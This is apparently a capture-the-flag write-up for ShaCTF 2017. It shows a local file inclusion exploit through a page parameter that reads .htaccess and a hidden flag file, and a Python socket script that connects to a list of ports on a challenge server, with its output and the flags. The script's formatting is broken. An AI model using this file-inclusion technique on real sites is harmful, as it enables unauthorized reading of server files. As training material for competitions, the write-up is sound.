ShaCTF 2017 Challenges [Web 100pts , Binary 100pts , Network 100pts] | October 20, 2017
[Web 100pts]
we given this target :
http://bonappetit.stillhackinganyway.nl/
after some browsing we Got this parametre is effected by Vulnerability LFI
http://bonappetit.stillhackinganyway.nl/?page=
from source code :
http://bonappetit.stillhackinganyway.nl/?page=.htaccess
<FilesMatch "suP3r_S3kr1t_Fl4G">
http://bonappetit.stillhackinganyway.nl/?page=suP3r_S3kr1t_Fl4G
the flag : flag{82d8173445ea865974fc0569c5c7cf7f}
The challenge name and description and the servers’ response ,
by using a script :
#!/usr/bin/python
import socket
plist = [88, 156, 983, 1287, 8743, 5622, 9123]
host = '34.249.81.124'
data = ""
for p in plist:
print("Attempting to connect to %s on port %s" % (host, p))
try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1.0) s.connect((host, p))
data += s.recv(1024)
data += s.recv(1024)
data += s.recv(1024)
s.close()
except Exception as e: continue print data
Attempting to connect to 34.249.81.124 on port 88
Attempting to connect to 34.249.81.124 on port 156
Attempting to connect to 34.249.81.124 on port 983
Attempting to connect to 34.249.81.124 on port 1287
Attempting to connect to 34.249.81.124 on port 8743
Attempting to connect to 34.249.81.124 on port 5622
Attempting to connect to 34.249.81.124 on port 9123
flag{6283a3856ce4766d88c475668837184b}
This Video include write ups of the 3 challenges : web , Binary , Network
#0v3n_Sh3ll ❤